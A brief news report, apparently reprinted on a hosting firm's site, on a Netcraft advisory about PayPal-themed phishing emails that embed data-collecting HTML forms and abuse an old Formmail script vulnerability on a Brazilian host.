Some phishing scammers are skipping the tough work of building realistic-looking Web sites, a security firm said Monday, and are instead taking advantage of an old vulnerability to put forms soliciting confidential data right in their spammed messages.
According to the U.K.-based Internet security and research firm Netcraft, the HTML mail masquerades as a security verification message from PayPal, and asks the recipient to fill out an HTML form that includes fields for credit card account number, Social Security number, and mother's maiden name. "Completing all of the checklist items will automatically restore your account access," the message says.
The mail, of course, is bogus, and the form results are instead mailed to a Yahoo account using a CGI script hosted by a Brazilian hosting service.
"Phishing typically collects data through a site that imitates a bank or online retailer. By including the data collector in an HTML e-mail, the new attack eliminates a step in the process, allowing phishing scams to steal sensitive information without constructing an elaborate fraudulent Web site," said Netcraft in an advisory.
The ploy takes advantage of a known vulnerability in Formmail, a form-to-mail Perl script that was maliciously used in 2001 to generate huge quantities of anonymous spam. Most hosting vendors have since replaced the original with customized versions, or substituted secure scripts like the NMS Project, said Netcraft.
Apparently, the Brazilian host used by these phishers is an exception.
UKFast is not responsible for the content of external Internet sites.